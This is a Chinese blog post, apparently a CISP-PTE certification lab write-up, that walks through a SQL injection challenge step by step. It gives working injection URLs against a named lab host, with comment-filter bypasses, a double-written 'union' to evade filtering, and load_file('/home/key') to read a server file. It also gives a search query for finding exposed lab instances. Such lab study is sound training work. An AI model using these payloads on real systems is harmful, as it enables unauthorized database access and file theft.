cisp-pte之SQL注入题一

最新推荐文章于 2024-05-14 09:45:02 发布
最新推荐文章于 2024-05-14 09:45:02 发布
阅读量497 收藏 3
点赞数 1
分类专栏: cisp-pte备考 文章标签: sql java python 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58544284/article/details/131186771
版权

靶场获取

hunter搜索:body=“cisp-pte 认证考试” 获取免费靶场
在这里插入图片描述

SQL注入题型一

1.审题

通过审题得知题目要求通过SQL注入漏洞读取网站/home/key文件,首先想到SQL语句“load_file()”
在这里插入图片描述
点击进入答题,尝试get请求参数id=1
在这里插入图片描述

2.确认注入点

单引号显示报错在这里插入图片描述

3.尝试闭合

http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=1%23

通过提示发现#、–、空格等均被过滤,符号尝试url编码绕过,空格通过/**/可绕过。
在这里插入图片描述

4.确认字段数

http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=1/**/group/**/by/**/4%23
http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=1/**/group/**/by/**/5%23

group by 4正常回显
group by 5回显报错
由此确认当前表的字段数为4
在这里插入图片描述

在这里插入图片描述

5.确认回显位置

http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=2/**/uniunionon/**/select/**/1,2,3,4%23

重点在于过滤了union,使用双写即可绕过。
在这里插入图片描述

6.注入获取key

审题时的事key在/home下,直接带入sql语句查询即可。

http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=2/**/uniunionon/**/select/**/1,2,load_file('/home/key'),4%23

在这里插入图片描述

c-4
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
cisp-pte基础题目SQL注入
weixin_53313406的博客
11-25 2969
cisp-pte基础题目SQL注入(超详细)
PTESQL注入(一)
HkD01L的博客
11-10 655
CISP-PTE国家注册信息安全渗透测试工程师课程笔记SQL注入 、联合查询注入、二阶注入、报错注入
CISP-PTE学习总结之基础练习(二)
千寻的博客
10-20 7662
基础题目一:SQL注入 0x01 题目要求 0x02 解过程 基础题目二:文件上传突破 0x01 题目要求 0x02 解过程 基础题目三:文件包含 0x01 题目要求 0x02 解过程 0x03 解总结 基础题目四:代码执行漏洞 0x01 题目要求 0x02 解过程 0x03 解总结 基础题目五:失效的访问控制 0x01 题目要求 0x02 解过程
CISP-PTE学习总结之基础练习(三)
千寻的博客
10-20 5711
练习题目一:SQL注入 0x01 题目要求 0x02 解答过程: 0x03 解总结: 练习题目二:文件上传突破 0x01 题目要求: 0x02 解过程: 0x03 解总结: 练习题目三:文件包含 0x01 题目要求 0x02 解过程 0x03 解总结: 练习题目四:反序列化漏洞 0x01 题目要求: 0x02 解过程 练习题目五:失效的访问控制 0x01 题目·要求: 0x02 解过程: 0x03 解总结:
2024年最全CISP-PTE考试大纲详解(3),鸿蒙面试库app
最新发布
2401_84871291的博客
05-14 282
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…实际操作解答2道,每10分,总分共100分。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
cisp700道(带答案)
11-20
cisp700道(带答案)
CISP-PTE练习篇(基础题目一:SQL注入
wojiaoqwe的博客
01-31 1889
本文仅当作练习记录使用。
1. 第一道sql注入所学
Tjohn9的博客
10-22 424
简单的sql注入思路
CISP-PTE八套真详解(侵删)
00勇士王子的博客
12-02 5842
PTE八套模拟详解,侵删
考试类精品--CISP-PTE 考试环境源码.zip
02-06
1. 渗透测试基础:包括端口扫描、漏洞探测、SQL注入、XSS攻击等各种常见的渗透测试技术。 2. 安全工具使用:可能包含Nmap、Burp Suite、Metasploit等工具的使用示例和源码。 3. 模拟考试系统:源码可能包含用于构建...
cisp-pte注册渗透测试工程师详细资料及视频教程
07-16
考生可以对这些源码进行分析,寻找潜在的安全漏洞,如SQL注入、跨站脚本(XSS)、文件包含漏洞等,并尝试编写Poc(Proof of Concept)验证漏洞存在。 学习CISP-PTE的过程中,考生需要对网络安全的法律法规有基本...
CISP库(2023)
08-21
注册信息安全专业人员 CISP 模拟试卷 \ CISP库(2023)、84页
CISP-PTE模拟练习网站源码.zip
11-22
4. **安全性实践**:作为CISP-PTE的练习,源码可能会体现各种安全措施,如输入验证、XSS防御、CSRF防护、SQL注入预防等。这些实践对于防止黑客攻击和保护用户隐私至关重要。 5. **渗透测试技术**:源码中可能包含了...
CISP-PTE认证资料.zip
03-27
cisp-pte靶场通关思路分享----SQL注入cisp-pte靶场通关思路分享----xss篇 cisp-pte靶场通关思路分享----命令执行的另外解思路 cisp-pte靶场通关思路分享----命令注入篇 cisp-pte靶场通关思路分享----日志分析篇...
CISP-PTE注册信息安全专业人员渗透测试工程师-认证课件资料
01-30
CISP-PTE注册信息安全专业人员渗透测试工程师-认证...05.SQL注入基础篇 07.暴力破解 08.文件上传漏洞 09.命令执行漏洞 10.文件包含漏洞 11.社会工程学 12.ARP欺骗 13.xss跨站脚本漏洞 14.CSRF跨站请求伪造 15.SSRF
精心整理-渗透测试工程师(CISP-PTE)考试资料大全(包括课件PPT,考试大纲,库及经验分享).zip
04-07
Web安全基础-I(SQL注入、XSS).pdf Web安全基础-II(请求伪造、文件处理、访问控制).pdf Web前端安全(XSS、CSRF).pdf Web应用渗透(注入、文件上传,包含、会话管理与访问控制).pdf 二、报名材料&&考试大纲 cisp-pte...
web漏洞-SQL注入漏洞、目录遍历漏洞、文件下载漏洞
ran的博客
01-10 1252
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
CISP-PTE SQL注入 入门篇
beirry的博客
12-21 1451
经过上一篇的文章,相信大家也初步掌握了sql语句,现在我们就来学习SQL注入的攻击语句。 mysql在版本5之前,只能通过盲注来获取数据,mysql在版本5以后,可以获取信息的方式就很多了,因为含有默认的库:information_schema,这个库存储着mysql的结构信息。我们通过这个库来获取数据表名,字段名。 判断查询类型 select * from users where id=1 这个语句意思是查询users表中id为1的所有字段,当我把这个id的字段挖空,让这个字段可以用户自己输入。那么攻击
CISP-PTE演示
热门推荐
weixin_48421613的博客
03-28 1万+
周末帮好兄弟做PTE的真,觉得确实挺有意思的,于是就有了这篇文章,侵删侵删哈 第一阶段 基础题目一:SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 ​ 开始答 这道的有趣的地方就是,你先注册用户,不同于以往的360的PTE,并不是以admin用户去发表文章就能看到key,按照往常的先注册一个用户吧 可以看见,此时提示的代码显示过滤掉“#”、“–”​注释符号,我们先正常写一篇文章试试 可以看见,这是
360 cisp-pte sql 环境 下载
08-22
在360 CISP-PTE SQL环境下载方面,可以通过以下步骤完成: 首先,打开360安全卫士软件,确保已经登录账户,并且软件处于最新版本。 其次,在软件的主界面中,可以找到一个名为“工具箱”的选项,点击进入。 在工具箱中,可以看到一个名为“实战实训”的模块,点击进入。 在实战实训模块中,可以选择PTE SQL环境下载。这个PTE SQL环境是为了进行SQL注入实验和训练而准备的,可以提供一个安全的环境供用户实践SQL注入攻击和防御的技术。 点击PTE SQL环境下载后,软件会自动为您下载并安装相关的环境。 安装完成后,您可以在360安全卫士的软件菜单中找到这个PTE SQL环境,并且可以通过它进行实际的SQL注入实验和训练。 总之,通过360 CISP-PTE SQL环境下载,用户可以方便地获取一个安全的环境进行SQL注入实验和训练,以提升自己的技术水平和安全意识。希望以上回答对您有帮助。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值